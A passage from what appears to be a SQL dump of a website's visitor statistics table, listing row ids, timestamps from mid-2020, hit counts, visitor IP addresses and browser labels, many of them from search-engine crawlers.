,0,'66.249.70.69','chrome'),(510314,1590954631,1,1,0,0,'66.249.64.36','chrome'),(510315,1590955139,1,1,0,0,'66.249.70.69','chrome'),(510316,1590955274,1,1,0,0,'51.15.119.40','chrome'),(510317,1590955341,2,2,0,0,'207.46.13.209','other'),(510318,1590955360,1,1,0,0,'66.249.64.33','chrome'),(510319,1590955676,8,8,0,0,'77.120.98.235','other'),(510320,1590956474,1,1,0,0,'66.249.70.70','chrome'),(510321,1590957577,1,1,0,0,'138.246.253.15','chrome'),(510322,1590958011,8,8,0,0,'77.120.98.235','other'),(510323,1590959119,1,1,0,0,'207.46.13.146','other'),(510324,1590959424,1,1,0,0,'173.252.111.10','other'),(510325,1590960092,2,2,0,0,'66.249.70.70','chrome'),(510326,1590960163,1,1,0,0,'8.29.198.27','other'),(510327,1590960177,3,3,0,0,'66.249.70.69','chrome'),(510328,1590960311,8,8,0,0,'77.120.98.235','other'),(510329,1590960467,1,1,0,0,'8.29.198.26','other'),(510330,1590961796,1,1,0,0,'178.154.200.216','other'),(510331,1590962582,8,8,0,0,'77.120.98.235','other'),(510332,1590962758,1,1,0,0,'66.249.70.72','chrome'),(510333,1590963775,1,1,0,0,'149.202.65.108','firefox'),(510334,1590964140,1,1,0,0,'178.154.200.222','other'),(510335,1590964869,8,8,0,0,'77.120.98.235','other'),(510336,1590965639,2,2,0,0,'207.46.13.146','other'),(510337,1590965676,1,1,0,0,'66.249.70.69','chrome'),(510338,1590965981,1,1,0,0,'178.154.200.222','other'),(510339,1590966396,1,1,0,0,'66.249.70.72','chrome'),(510340,1590966607,2,2,0,0,'207.46.13.209','other'),(510341,1590966962,1,0,1,0,'66.249.70.70',''),(510342,1590967133,8,8,0,0,'77.120.98.235','other'),(510343,1590967456,1,1,0,0,'66.249.70.69','chrome'),(510344,1590967679,1,1,0,0,'207.46.13.146','other'),(510345,1590968420,1,1,0,0,'66.249.70.72','chrome'),(510346,1590968679,1,1,0,0,'95.158.45.107','chrome'),(510347,1590968910,1,1,0,0,'66.249.70.70','chrome'),(510348,1590969306,1,1,0,0,'62.205.134.182','other'),(510349,1590969440,8,8,0,0,'77.120.98.235','other'),(510350,1590970503,1,1,0,0,'216.158.226.225','other'),(510351,1590970985,2,2,0,0,'8.29.198.26','other'),(510352,1590971241,4,4,0,0,'66.249.70.70','chrome'),(510353,1590971261,2,2,0,0,'66.249.70.69','chrome'),(510354,1590971731,8,8,0,0,'77.120.98.235','other'),(510355,1590972728,1,1,0,0,'157.55.39.235','other'),(510356,1590972972,1,1,0,0,'93.124.7.131','chrome'),(510357,1590973026,1,1,0,0,'66.249.70.70','chrome'),(510358,1590973043,1,1,0,0,'178.154.200.191','other'),(510359,1590973199,1,1,0,0,'66.249.70.72','chrome'),(510360,1590973249,1,1,0,0,'207.46.13.146','other'),(510361,1590973966,8,8,0,0,'77.120.98.235','other'),(510362,1590974183,1,1,0,0,'157.55.39.235','other'),(510363,1590974786,1,1,0,0,'66.249.70.69','chrome'),(510364,1590974993,1,1,0,0,'66.249.64.36','chrome'),(510365,1590976148,8,8,0,0,'77.120.98.235','other'),(510366,1590976183,2,2,0,0,'66.249.64.33','chrome'),(510367,1590976200,1,1,0,0,'207.46.13.209','other'),(510368,1590976617,1,1,0,0,'207.46.13.74','other'),(510369,1590976682,1,1,0,0,'66.249.70.72','chrome'),(510370,1590978265,1,1,0,0,'66.249.70.70','chrome'),(510371,1590978350,8,8,0,0,'77.120.98.235','other'),(510372,1590978865,2,2,0,0,'66.249.70.72','chrome'),(510373,1590980252,1,1,0,0,'66.249.70.72','chrome'),(510374,1590980503,8,8,0,0,'77.120.98.235','other'),(510375,1590980627,1,1,0,0,'66.249.70.69','chrome'),(510376,1590981808,1,1,0,0,'8.29.198.26','other'),(510377,1590981915,1,1,0,0,'178.154.200.222','other'),(510378,1590981922,1,1,0,0,'207.46.13.74','other'),(510379,1590982084,3,3,0,0,'157.55.39.235','other'),(510380,1590982128,1,1,0,0,'8.29.198.27','other'),(510381,1590982579,1,1,0,0,'47.108.80.103','firefox'),(510382,1590982649,8,8,0,0,'77.120.98.235','other'),(510383,1590982714,1,1,0,0,'207.46.13.146','other'),(510384,1590984169,1,1,0,0,'207.46.13.209','other'),(510385,1590984848,8,8,0,0,'77.120.98.235','other'),(510386,1590985060,1,1,0,0,'66.249.64.36','chrome'),(510387,1590986923,1,1,0,0,'178.154.200.222','other'),(510388,1590987038,1,1,0,0,'62.205.134.182','other'),(510389,1590987135,8,8,0,0,'77.120.98.235','other'),(510390,1590987795,1,1,0,0,'66.249.70.69','chrome'),(510391,1590987994,1,1,0,0,'66.249.64.36','chrome'),(510392,1590988489,1,1,0,0,'207.46.13.146','other'),(510393,1590989100,1,1,0,0,'178.154.200.206','other'),(510394,1590989275,1,1,0,0,'207.46.13.74','other'),(510395,1590989429,8,8,0,0,'77.120.98.235','other'),(510396,1590990011,1,1,0,0,'185.138.228.227','chrome'),(510397,1590990105,1,1,0,0,'51.77.52.160','chrome'),(510398,1590990837,1,1,0,0,'66.249.64.36','chrome'),(510399,1590990971,1,1,0,0,'66.249.70.70','chrome'),(510400,1590991778,8,8,0,0,'77.120.98.235','other'),(510401,1590992056,1,1,0,0,'157.55.39.235','other'),(510402,1590992631,1,1,0,0,'8.29.198.26','other'),(510403,1590992778,2,2,0,0,'207.46.13.146','other'),(510404,1590992955,1,1,0,0,'8.29.198.25','other'),(510405,1590993399,1,1,0,0,'66.249.64.36','chrome'),(510406,1590993658,1,1,0,0,'66.249.70.69','chrome'),(510407,1590994094,1,1,0,0,'91.196.178.86','chrome'),(510408,1590994129,1,1,0,0,'176.67.29.2','chrome'),(510409,1590994236,8,8,0,0,'77.120.98.235','other'),(510410,1590994430,1,1,0,0,'94.179.208.251','chrome'),(510411,1590994493,1,1,0,0,'66.249.70.70','chrome'),(510412,1590995455,1,1,0,0,'207.46.13.146','other'),(510413,1590995652,1,1,0,0,'94.179.208.251','chrome'),(510414,1590996319,1,1,0,0,'131.220.6.152','chrome'),(510415,1590996642,1,1,0,0,'66.249.64.36','chrome'),(510416,1590996685,8,8,0,0,'77.120.98.235','other'),(510417,1590996783,1,1,0,0,'207.46.13.209','other'),(510418,1590998457,1,1,0,0,'91.196.178.86','chrome'),(510419,1590998519,3,3,0,0,'207.46.13.209','other'),(510420,1590998585,1,1,0,0,'66.249.70.69','chrome'),(510421,1590998639,1,1,0,0,'207.46.13.146','other'),(510422,1590998735,2,2,0,0,'66.249.70.70','chrome'),(510423,1590999304,8,8,0,0,'77.120.98.235','other'),(510424,1590999987,1,1,0,0,'178.154.200.222','other'),(510425,1591000035,1,1,0,0,'37.53.206.35','chrome'),(510426,1591001207,1,1,0,0,'91.124.118.189','chrome'),(510427,1591002659,1,1,0,0,'161.35.184.8','other'),(510428,1591003459,1,1,0,0,'8.29.198.25','other'),(510429,1591003785,1,1,0,0,'8.29.198.27','other'),(510430,1591004007,1,1,0,0,'66.249.70.70','chrome'),(510431,1591004719,8,8,0,0,'77.120.98.235','other'),(510432,1591005867,1,1,0,0,'178.154.200.222','chrome'),(510433,1591005884,1,1,0,0,'178.154.200.222','other'),(510434,1591006051,1,1,0,0,'3.22.116.171','chrome'),(510435,1591006657,1,1,0,0,'66.249.70.72','chrome'),(510436,1591006842,1,1,0,0,'207.46.13.146','other'),(510437,1591007174,1,1,0,0,'66.249.70.70','chrome'),(510438,1591008108,1,1,0,0,'84.17.35.23','chrome'),(510439,1591008624,1,1,0,0,'109.74.154.72','chrome'),(510440,1591009899,1,1,0,0,'66.249.70.69','chrome'),(510441,1591010318,1,1,0,0,'66.249.70.72','chrome'),(510442,1591011020,1,1,0,0,'207.46.13.146','other'),(510443,1591011103,1,1,0,0,'66.249.70.69','chrome'),(510444,1591011341,1,1,0,0,'66.249.70.72','chrome'),(510445,1591011599,1,1,0,0,'66.249.70.70','chrome'),(510446,1591011633,1,1,0,0,'92.38.136.69','chrome'),(510447,1591012283,1,1,0,0,'207.46.13.146','other'),(510448,1591013250,3,3,0,0,'66.249.70.69','chrome'),(510449,1591013739,1,1,0,0,'66.249.70.70','chrome'),(510450,1591014217,2,2,0,0,'207.46.13.209','other'),(510451,1591014265,2,2,0,0,'207.46.13.74','other'),(510452,1591014283,1,1,0,0,'91.124.118.189','chrome'),(510453,1591014288,1,1,0,0,'8.29.198.26','other'),(510454,1591014325,1,1,0,0,'66.249.64.38','chrome'),(510455,1591014606,1,1,0,0,'8.29.198.27','other'),(510456,1591015272,1,1,0,0,'207.46.13.146','other'),(510457,1591015626,2,1,1,0,'66.249.70.69',''),(510458,1591015772,1,1,0,0,'207.46.13.209','other'),(510459,1591015778,2,2,0,0,'66.249.70.70','chrome'),(510460,1591015974,1,1,0,0,'213.180.203.16','other'),(510461,1591016153,1,1,0,0,'95.134.119.197','chrome'),(510462,1591016201,8,8,0,0,'77.120.98.235','other'),(510463,1591016890,1,1,0,0,'17.58.99.7','other'),(510464,1591018087,1,1,0,0,'91.196.178.86','chrome'),(510465,1591018252,1,1,0,0,'207.46.13.209','other'),(510466,1591018847,1,1,0,0,'66.249.70.72','chrome'),(510467,1591018911,1,1,0,0,'91.196.178.51','other'),(510468,1591018979,1,1,0,0,'17.58.99.7','other'),(510469,1591019740,1,1,0,0,'207.46.13.74','other'),(510470,1591019773,8,8,0,0,'77.120.98.235','other'),(510471,1591020549,1,1,0,0,'207.46.13.209','other'),(510472,1591020670,1,1,0,0,'62.210.149.60','other'),(510473,1591021102,1,1,0,0,'89.202.46.157','chrome'),(510474,1591021569,2,2,0,0,'207.46.13.74','other'),(510475,1591021807,1,1,0,0,'66.249.70.69','chrome'),(510476,1591021933,1,1,0,0,'207.46.13.209','other'),(510477,1591022013,8,8,0,0,'77.120.98.235','other'),(510478,1591022225,1,1,0,0,'66.249.70.72','chrome'),(510479,1591022912,1,1,0,0,'66.249.64.38','chrome'),(510480,1591023918,1,1,0,0,'207.46.13.74','other'),(510481,1591024173,8,8,0,0,'77.120.98.235','other'),(510482,1591025120,2,2,0,0,'8.29.198.25','other'),(510483,1591025362,1,1,0,0,'66.249.70.69','chrome'),(510484,1591025670,1,1,0,0,'66.249.64.38','chrome'),(510485,1591026230,1,1,0,0,'66.249.70.70','chrome'),(510486,1591026314,8,8,0,0,'77.120.98.235','other'),(510487,1591026319,1,1,0,0,'66.249.70.69','chrome'),(510488,1591026819,1,1,0,0,'207.46.13.74','other'),(510489,1591027275,1,1,0,0,'91.196.178.71','chrome'),(510490,1591027459,1,1,0,0,'66.249.70.69','chrome'),(510491,1591027741,1,1,0,0,'194.61.24.94','other'),(510492,1591028063,1,1,0,0,'66.249.70.72','chrome'),(510493,1591028468,1,1,0,0,'207.46.13.209','other'),(510494,1591028516,8,8,0,0,'77.120.98.235','other'),(510495,1591028601,2,2,0,0,'207.46.13.74','other'),(510496,1591029129,1,1,0,0,'66.249.70.72','chrome'),(510497,1591030758,8,8,0,0,'77.120.98.235','other'),(510498,1591030820,1,1,0,0,'207.46.13.146','other'),(510499,1591031005,1,1,0,0,'66.249.70.70','chrome'),(510500,1591031094,1,1,0,0,'207.46.13.209','other'),(510501,1591031176,2,2,0,0,'66.249.70.69','chrome'),(510502,1591032117,2,2,0,0,'207.46.13.74','other'),(510503,1591032546,1,1,0,0,'66.249.70.72','chrome'),(510504,1591032746,1,1,0,0,'207.46.13.209','other'),(510505,1591032789,1,1,0,0,'66.102.9.169','chrome'),(510506,1591033129,8,8,0,0,'77.120.98.235','other'),(510507,1591034249,1,1,0,0,'178.154.200.220','other'),(510508,1591034539,1,1,0,0,'66.249.70.70','chrome'),(510509,1591034879,2,2,0,0,'207.46.13.209','other'),(510510,1591034941,1,1,0,0,'178.154.200.250','other'),(510511,1591035036,1,1,0,0,'66.249.70.72','chrome'),(510512,1591035424,8,8,0,0,'77.120.98.235','other'),(510513,1591035431,2,2,0,0,'207.46.13.146','other'),(510514,1591035949,1,1,0,0,'8.29.198.25','other'),(510515,1591036209,1,1,0,0,'66.249.70.70','chrome'),(510516,1591036253,1,1,0,0,'8.29.198.26','other'),(510517,1591036428,1,1,0,0,'66.249.70.69','chrome'),(510518,1591036475,2,2,0,0,'66.249.70.72','chrome'),(510519,1591037172,1,1,0,0,'62.149.7.167','chrome'),(510520,1591037717,8,8,0,0,'77.120.98.235','other'),(510521,1591038267,1,1,0,0,'66.249.70.70','chrome'),(510522,1591038326,1,1,0,0,'47.254.41.44','chrome'),(510523,1591038329,2,2,0,0,'47.88.46.21','chrome'),(510524,1591038443,2,2,0,0,'66.249.70.69','chrome'),(510525,1591038453,1,1,0,0,'66.249.64.36','chrome'),(510526,1591038638,1,1,0,0,'66.249.70.72','chrome'),(510527,1591039112,1,1,0,0,'88.155.184.54','chrome'),(510528,1591039863,2,2,0,0,'66.249.70.72','chrome'),(510529,1591039879,1,1,0,0,'82.145.210.254','other'),(510530,1591040029,8,8,0,0,'77.120.98.235','other'),(510531,1591040296,1,1,0,0,'37.73.106.173','chrome'),(510532,1591040688,1,1,0,0,'66.249.70.69','chrome'),(510533,1591041552,1,1,0,0,'66.249.70.70','chrome'),(510534,1591041619,1,1,0,0,'66.249.70.69','chrome'),(510535,1591041802,2,2,0,0,'207.46.13.209','other'),(510536,1591042209,1,1,0,0,'86.135.191.89','chrome'),(510537,1591042349,8,8,0,0,'77.120.98.235','other'),(510538,1591042749,1,0,1,0,'66.249.70.69',''),(510539,1591042785,1,1,0,0,'207.46.13.209','other'),(510540,1591042876,1,1,0,0,'66.249.70.70','chrome'),(510541,1591043247,1,1,0,0,'207.46.13.74','other'),(510542,1591043758,2,2,0,0,'95.213.141.126','opera'),(510543,1591044615,8,8,0,0,'77.120.98.235','other'),(510544,1591045660,1,1,0,0,'66.249.64.33','chrome'),(510545,1591046609,2,1,1,0,'66.249.70.69',''),(510546,1591046770,2,2,0,0,'8.29.198.27','other'),(510547,1591046895,1,1,0,0,'207.46.13.209','other'),(510548,1591046915,8,8,0,0,'77.120.98.235','other'),(510549,1591047280,1,1,0,0,'66.249.70.72','chrome'),(510550,1591048370,1,1,0,0,'90.151.35.75','chrome'),(510551,1591048405,1,1,0,0,'66.249.64.33','chrome'),(510552,1591049166,8,8,0,0,'77.120.98.235','other'),(510553,1591049386,1,1,0,0,'66.249.70.70','chrome'),(510554,1591049730,1,1,0,0,'207.46.13.74','other'),(510555,1591049826,1,1,0,0,'66.249.70.72','chrome'),(510556,1591050121,1,1,0,0,'178.154.200.222','other'),(510557,1591050782,2,2,0,0,'207.46.13.209','other'),(510558,1591051072,2,2,0,0,'66.249.70.72','chrome'),(510559,1591051502,8,8,0,0,'77.120.98.235','other'),(510560,1591051878,1,1,0,0,'66.249.70.69','chrome'),(510561,1591051927,1,1,0,0,'167.172.58.147','chrome'),(510562,1591052612,1,1,0,0,'183.136.225.46','firefox'),(510563,1591052927,1,1,0,0,'178.92.73.223','firefox'),(510564,1591053495,1,1,0,0,'207.46.13.74','other'),(510565,1591053868,8,8,0,0,'77.120.98.235','other'),(510566,1591054285,1,1,0,0,'207.46.13.146','other'),(510567,1591054820,2,2,0,0,'207.46.13.209','other'),(510568,1591055706,1,1,0,0,'62.205.134.182','other'),(510569,1591056090,2,2,0,0,'207.46.13.74','other'),(510570,1591056143,8,8,0,0,'77.120.98.235','other'),(510571,1591056157,2,2,0,0,'207.46.13.146','other'),(510572,1591056860,1,1,0,0,'207.46.13.209','other'),(510573,1591057601,1,1,0,0,'8.29.198.26','other'),(510574,1591057903,1,1,0,0,'8.29.198.25','other'),(510575,1591057973,1,1,0,0,'91.209.11.236','other'),(510576,1591058363,1,1,0,0,'66.249.70.72','chrome'),(510577,1591058486,8,8,0,0,'77.120.98.235','other'),(510578,1591059514,1,1,0,0,'207.46.13.74','other'),(510579,1591059921,1,1,0,0,'207.46.13.209','other'),(510580,1591060416,1,1,0,0,'178.154.200.222','chrome'),(510581,1591060713,8,8,0,0,'77.120.98.235','other'),(510582,1591062697,1,1,0,0,'207.46.13.209','other'),(510583,1591062870,8,8,0,0,'77.120.98.235','other'),(510584,1591063138,1,1,0,0,'66.249.70.70','chrome'),(510585,1591063730,1,1,0,0,'192.71.225.127','other'),(510586,1591063982,1,1,0,0,'66.249.70.72','chrome'),(510587,1591064494,1,1,0,0,'17.58.99.7','other'),(510588,1591064697,1,1,0,0,'207.46.13.146','other'),(510589,1591065074,8,8,0,0,'77.120.98.235','other'),(510590,1591065398,1,1,0,0,'66.249.70.70','chrome'),(510591,1591066507,1,1,0,0,'207.46.13.209','other'),(510592,1591066938,1,1,0,0,'66.249.64.38','chrome'),(510593,1591067218,1,1,0,0,'207.46.13.146','other'),(510594,1591067227,8,8,0,0,'77.120.98.235','other'),(510595,1591067551,1,0,1,0,'66.249.70.69',''),(510596,1591068447,1,1,0,0,'8.29.198.26','other'),(510597,1591068723,1,1,0,0,'8.29.198.25','other'),(510598,1591069398,8,8,0,0,'77.120.98.235','other'),(510599,1591071076,1,1,0,0,'178.154.200.97','other'),(510600,1591071135,1,1,0,0,'213.180.203.16','other'),(510601,1591071383,1,1,0,0,'17.58.99.7','other'),(510602,1591071419,1,1,0,0,'66.249.70.69','chrome'),(510603,1591071653,8,8,0,0,'77.120.98.235','other'),(510604,1591072695,1,1,0,0,'66.249.70.69','chrome'),(510605,1591073423,1,1,0,0,'207.46.13.209','other'),(510606,1591073469,1,1,0,0,'62.205.134.182','other'),(510607,1591073919,8,8,0,0,'77.120.98.235','other'),(510608,1591074809,1,1,0,0,'91.196.178.174','chrome'),(510609,1591075108,1,1,0,0,'17.58.99.7','other'),(510610,1591076179,8,8,0,0,'77.120.98.235','other'),(510611,1591076257,1,1,0,0,'66.249.64.38','chrome'),(510612,1591076447,1,1,0,0,'130.180.211.230','chrome'),(510613,1591077811,1,1,0,0,'66.249.64.36','chrome'),(510614,1591077913,1,1,0,0,'13.66.139.0','other'),(510615,1591077974,1,1,0,0,'66.249.70.69','chrome'),(510616,1591078013,1,1,0,0,'66.249.70.70','chrome'),(510617,1591078422,8,8,0,0,'77.120.98.235','other'),(510618,1591079084,1,1,0,0,'66.249.70.70','chrome'),(510619,1591079188,2,2,0,0,'66.249.70.69','chrome'),(510620,1591079218,1,1,0,0,'13.66.139.0','other'),(510621,1591079280,1,1,0,0,'8.29.198.25','other'),(510622,1591079548,1,1,0,0,'8.29.198.26','other'),(510623,1591079675,1,1,0,0,'66.249.70.72','chrome'),(510624,1591080523,1,1,0,0,'91.196.178.108','chrome'),(510625,1591080674,8,8,0,0,'77.120.98.235','other'),(510626,1591081280,1,0,1,0,'66.249.70.72',''),(510627,1591081375,2,2,0,0,'207.46.13.74','other'),(510628,1591082410,3,0,3,0,'66.249.70.70',''),(510629,1591082468,1,0,1,0,'66.249.70.69',''),(510630,1591082535,1,0,1,0,'66.249.70.72',''),(510631,1591082555,1,1,0,0,'95.28.79.1','chrome'),(510632,1591082611,2,2,0,0,'207.46.13.209','other'),(510633,1591082628,2,2,0,0,'207.46.13.146','other'),(510634,1591082969,8,8,0,0,'77.120.98.235','other'),(510635,1591083194,1,1,0,0,'131.220.6.152','chrome'),(510636,1591083412,1,1,0,0,'91.196.178.173','chrome'),(510637,1591084142,1,1,0,0,'207.46.13.209','other'),(510638,1591085244,8,8,0,0,'77.120.98.235','other'),(510639,1591086571,1,1,0,0,'207.46.13.146','other'),(510640,1591087714,1,1,0,0,'138.246.253.15','chrome'),(510641,1591087747,8,8,0,0,'77.120.98.235','other'),(510642,1591087753,1,1,0,0,'91.196.178.187','chrome'),(510643,1591088854,1,0,1,0,'66.249.70.72',''),(510644,1591089506,1,0,1,0,'66.249.70.69',''),(510645,1591090124,1,1,0,0,'8.29.198.26','other'),(510646,1591090168,1,0,1,0,'66.249.70.72',''),(510647,1591090376,1,1,0,0,'8.29.198.27','other'),(510648,1591090686,8,8,0,0,'77.120.98.235','other'),(510649,1591091083,1,1,0,0,'207.46.13.74','other'),(510650,1591091512,1,0,1,0,'66.249.70.69',''),(510651,1591092883,1,1,0,0,'185.189.186.58','chrome'),(510652,1591092945,1,1,0,0,'3.235.143.183','chrome'),(510653,1591093596,1,1,0,0,'91.196.178.171','chrome'),(510654,1591094231,8,8,0,0,'77.120.98.235','other'),(510655,1591096309,1,1,0,0,'207.46.13.146','other'),(510656,1591096396,1,0,1,0,'66.249.70.70',''),(510657,1591096912,8,8,0,0,'77.120.98.235','other'),(510658,1591097032,3,3,0,0,'208.110.93.78','other'),(510659,1591097301,1,1,0,0,'144.91.99.244','other'),(510660,1591098060,1,1,0,0,'207.46.13.74','other'),(510661,1591098291,1,1,0,0,'207.46.13.146','other'),(510662,1591098305,1,1,0,0,'130.180.211.103','chrome'),(510663,1591098357,1,0,1,0,'66.249.70.70',''),(510664,1591099895,1,1,0,0,'185.41.152.158','other'),(510665,1591100280,1,1,0,0,'207.46.13.209','other'),(510666,1591100383,1,0,1,0,'66.249.70.70',''),(510667,1591100964,1,1,0,0,'8.29.198.27','other'),(510668,1591101124,1,1,0,0,'109.74.154.72','chrome'),(510669,1591101240,1,1,0,0,'8.29.198.26','other'),(510670,1591101526,2,2,0,0,'207.46.13.209','other'),(510671,1591102147,11,11,0,0,'176.113.115.222','msie'),(510672,1591102378,1,1,0,0,'207.46.13.74','other'),(510673,1591102438,1,1,0,0,'207.46.13.209','other'),(510674,1591102592,8,8,0,0,'77.120.98.235','other'),(510675,1591102767,1,1,0,0,'207.46.13.146','other'),(510676,1591102804,1,1,0,0,'91.196.177.193','chrome'),(510677,1591103733,2,2,0,0,'207.46.13.146','other'),(510678,1591104117,1,1,0,0,'207.46.13.74','other'),(510679,1591104537,1,0,1,0,'66.249.70.70',''),(510680,1591105626,1,1,0,0,'194.61.24.94','other'),(510681,1591107077,3,3,0,0,'207.46.13.209','other'),(510682,1591107275,1,0,1,0,'66.249.70.70',''),(510683,1591107403,2,2,0,0,'207.46.13.74','other'),(510684,1591108795,1,0,1,0,'66.249.70.70',''),(510685,1591109465,1,1,0,0,'207.46.13.146','other'),(510686,1591110318,1,1,0,0,'93.159.230.28','chrome'),(510687,1591111442,2,2,0,0,'207.46.13.146','other'),(510688,1591111797,2,2,0,0,'8.29.198.26','other'),(510689,1591112487,2,2,0,0,'207.46.13.146','other'),(510690,1591112564,1,1,0,0,'207.46.13.74','other'),(510691,1591113058,1,1,0,0,'91.196.178.79','firefox'),(510692,1591113069,2,2,0,0,'207.46.13.209','other'),(510693,1591113976,2,2,0,0,'207.46.13.74','other'),(510694,1591114283,1,1,0,0,'207.46.13.146','other'),(510695,1591114330,1,1,0,0,'106.12.136.105','firefox'),(510696,1591114713,1,1,0,0,'207.46.13.209','other'),(510697,1591114901,1,1,0,0,'66.249.70.72','chrome'),(510698,1591115206,1,1,0,0,'91.196.178.151','chrome'),(510699,1591116094,1,1,0,0,'207.46.13.146','other'),(510700,1591116236,1,0,1,0,'66.249.70.69',''),(510701,1591116368,1,1,0,0,'17.58.99.7','other'),(510702,1591116702,2,2,0,0,'207.46.13.209','other'),(510703,1591118985,1,1,0,0,'188.163.40.162','other'),(510704,1591118991,1,1,0,0,'93.124.7.131','chrome'),(510705,1591119068,1,1,0,0,'207.46.13.209','other'),(510706,1591120036,1,1,0,0,'207.46.13.146','other'),(510707,1591120420,1,1,0,0,'207.46.13.209','other'),(510708,1591121771,1,1,0,0,'91.196.178.21','chrome'),(510709,1591122360,1,0,1,0,'66.249.70.70',''),(510710,1591122366,1,1,0,0,'66.249.70.69','chrome'),(510711,1591122640,2,2,0,0,'8.29.198.26','other'),(510712,1591125153,1,1,0,0,'207.46.13.209','other'),(510713,1591126340,1,1,0,0,'207.46.13.209','other'),(510714,1591127144,1,1,0,0,'207.46.13.74','other'),(510715,1591127470,1,1,0,0,'88.155.124.124','chrome'),(510716,1591128405,8,8,0,0,'77.120.98.235','other'),(510717,1591129684,18,18,0,0,'95.91.33.17','other'),(510718,1591129804,2,2,0,0,'207.46.13.209','other'),(510719,1591130945,2,2,0,0,'207.46.13.74','other'),(510720,1591131053,1,1,0,0,'47.108.80.103','other'),(510721,1591131201,29,29,0,0,'192.99.4.163','other'),(510722,1591133015,1,0,1,0,'66.249.70.70',''),(510723,1591133474,1,1,0,0,'8.29.198.25','other'),(510724,1591133719,1,1,0,0,'8.29.198.27','other'),(510725,1591134499,1,1,0,0,'109.195.179.88','chrome'),(510726,1591134813,1,1,0,0,'66.249.70.70','chrome'),(510727,1591136661,1,1,0,0,'207.46.13.209','other'),(510728,1591138792,1,1,0,0,'91.196.121.134','chrome'),(510729,1591140029,1,1,0,0,'207.46.13.74','other'),(510730,1591141813,1,1,0,0,'207.46.13.74','other'),(510731,1591142107,1,1,0,0,'62.205.134.182','other'),(510732,1591144311,1,1,0,0,'8.29.198.26','other'),(510733,1591144492,1,1,0,0,'207.46.13.209','other'),(510734,1591144543,1,1,0,0,'8.29.198.25','other'),(510735,1591147002,8,8,0,0,'77.120.98.235','other'),(510736,1591147970,1,1,0,0,'13.66.139.0','other'),(510737,1591149071,8,8,0,0,'77.120.98.235','other'),(510738,1591151224,8,8,0,0,'77.120.98.235','other'),(510739,1591152757,1,1,0,0,'207.46.13.100','other'),(510740,1591153402,8,8,0,0,'77.120.98.235','other'),(510741,1591154128,1,1,0,0,'207.46.13.100','other'),(510742,1591154661,1,1,0,0,'17.58.99.7','other'),(510743,1591155143,2,2,0,0,'8.29.198.25','other'),(510744,1591155647,8,8,0,0,'77.120.98.235','other'),(510745,1591156786,1,1,0,0,'207.46.13.209','other'),(510746,1591156980,1,1,0,0,'118.31.111.216','firefox'),(510747,1591157918,8,8,0,0,'77.120.98.235','other'),(510748,1591158156,1,1,0,0,'207.46.13.100','other'),(510749,1591159009,1,1,0,0,'207.46.13.209','other'),(510750,1591159351,1,1,0,0,'207.46.13.100','other'),(510751,1591159697,1,1,0,0,'62.205.134.182','other'),(510752,1591159769,1,1,0,0,'91.219.222.186','firefox'),(510753,1591160135,8,8,0,0,'77.120.98.235','other'),(510754,1591162396,8,8,0,0,'77.120.98.235','other'),(510755,1591163087,1,1,0,0,'91.196.178.34','chrome'),(510756,1591163344,1,1,0,0,'207.46.13.100','other'),(510757,1591163614,1,1,0,0,'207.46.13.209','other'),(510758,1591164727,8,8,0,0,'77.120.98.235','other'),(510759,1591165979,2,2,0,0,'8.29.198.27','other'),(510760,1591166340,1,1,0,0,'94.153.30.5','chrome'),(510761,1591166565,1,1,0,0,'91.196.178.163','chrome'),(510762,1591166617,1,1,0,0,'91.196.178.94','chrome'),(510763,1591166643,1,1,0,0,'207.46.13.209','other'),(510764,1591166845,1,1,0,0,'207.46.13.100','other'),(510765,1591167057,8,8,0,0,'77.120.98.235','other'),(510766,1591167813,1,1,0,0,'130.180.210.131','chrome'),(510767,1591168216,2,2,0,0,'207.46.13.100','other'),(510768,1591168963,2,2,0,0,'207.46.13.209','other'),(510769,1591169056,1,1,0,0,'131.220.6.152','chrome'),(510770,1591169417,8,8,0,0,'77.120.98.235','other'),(510771,1591171712,1,1,0,0,'195.123.245.164','msie'),(510772,1591171911,8,8,0,0,'77.120.98.235','other'),(510773,1591172556,1,1,0,0,'207.46.13.74','other'),(510774,1591173340,6,6,0,0,'34.238.190.122','other'),(510775,1591174257,8,8,0,0,'77.120.98.235','other'),(510776,1591174303,7,7,0,0,'34.238.190.122','other'),(510777,1591175273,8,8,0,0,'34.238.190.122','other'),(510778,1591176189,10,10,0,0,'34.238.190.122','other'),(510779,1591176409,1,1,0,0,'209.17.96.66','other'),(510780,1591176654,8,8,0,0,'77.120.98.235','other'),(510781,1591176813,2,2,0,0,'8.29.198.27','other'),(510782,1591177159,5,5,0,0,'34.238.190.122','other'),(510783,1591178116,4,4,0,0,'34.238.190.122','other'),(510784,1591179183,4,4,0,0,'34.238.190.122','other'),(510785,1591179364,1,1,0,0,'91.196.179.33','chrome'),(510786,1591179461,1,1,0,0,'78.111.185.164','chrome'),(510787,1591179523,1,1,0,0,'34.204.182.130','chrome'),(510788,1591179528,8,8,0,0,'77.120.98.235','other'),(510789,1591180195,7,7,0,0,'34.238.190.122','other'),(510790,1591180370,1,1,0,0,'207.46.13.209','other'),(510791,1591180634,1,0,1,0,'66.249.70.70',''),(510792,1591180666,1,1,0,0,'66.249.70.70','chrome'),(510793,1591181466,1,1,0,0,'207.46.13.209','other'),(510794,1591181801,4,4,0,0,'34.238.190.122','other'),(510795,1591182430,1,1,0,0,'109.74.154.72','chrome'),(510796,1591182508,2,2,0,0,'95.213.141.126','opera'),(510797,1591182517,1,1,0,0,'207.46.13.100','other'),(510798,1591182726,8,8,0,0,'77.120.98.235','other'),(510799,1591182747,1,1,0,0,'185.206.224.254','chrome'),(510800,1591184716,1,1,0,0,'207.46.13.209','other'),(510801,1591184767,1,1,0,0,'213.180.203.16','other'),(510802,1591184946,1,1,0,0,'173.252.111.2','other'),(510803,1591185337,1,1,0,0,'194.61.24.94','other'),(510804,1591185555,1,1,0,0,'2.47.39.213','other'),(510805,1591185739,2,2,0,0,'94.153.22.31','other'),(510806,1591185818,1,1,0,0,'207.46.13.74','other'),(510807,1591185878,1,1,0,0,'207.46.13.100','other'),(510808,1591186368,1,1,0,0,'193.106.30.99','firefox'),(510809,1591186604,8,8,0,0,'77.120.98.235','other'),(510810,1591186736,1,1,0,0,'91.196.178.86','chrome'),(510811,1591187482,1,0,1,0,'66.249.70.69',''),(510812,1591187523,1,1,0,0,'207.46.13.74','other'),(510813,1591187649,1,1,0,0,'8.29.198.25','other'),(510814,1591187884,1,1,0,0,'8.29.198.26','other'),(510815,1591188136,1,1,0,0,'66.249.70.69','chrome'),(510816,1591188144,1,1,0,0,'91.196.178.181','chrome'),(510817,1591188505,1,1,0,0,'91.196.177.147','chrome'),(510818,1591190994,8,8,0,0,'77.120.98.235','other'),